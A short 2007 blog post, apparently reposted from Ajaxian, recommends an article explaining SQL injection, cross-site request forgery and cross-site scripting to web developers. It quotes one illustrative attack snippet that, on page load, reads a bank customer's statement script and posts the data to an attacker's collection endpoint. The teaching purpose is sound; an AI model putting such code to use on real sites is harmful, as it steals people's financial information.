Digg Removes List of Top Users »
« Stealing Events via Capture

Making your web applications more secure:

Written by on February 2nd, 2007 in Ajax News.

You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Nadav Samet has written a simple article explaining various security attacks called Prepare for Attack!—Making Your Web Applications More Secure.

It explains in simple terms, with simple code examples:

  • SQL Injection Attacks
  • XSRF: Cross-Site Request Forgery
  • XSS: Cross-Site Scripting

XSRF: Stealing Information with Scriptaculous

HTML:

  1.  
  2. <script src=”http://www.tgbank.com/monthly_statement.js” type=”text/javascript”></script>
  3. <script type=”text/javascript”>
  4.     function send_data_to_the_criminal() {
  5.         /* code that converts the statement
  6.             object to string goes here */
  7.         Ajax.Request(’/collect_other_people_data.php’,
  8.                 postBody=’data=’+statement;
  9.     }
  10. window.onload = send_data_to_the_criminal;
  11. </script>
  12.  

Source: Ajaxian
Original Article: http://ajaxian.com/archives/making-your-web-applications-more-secure

Leave a Reply

You must be logged in to post a comment.


Site Navigation

Pages

Recently

Archives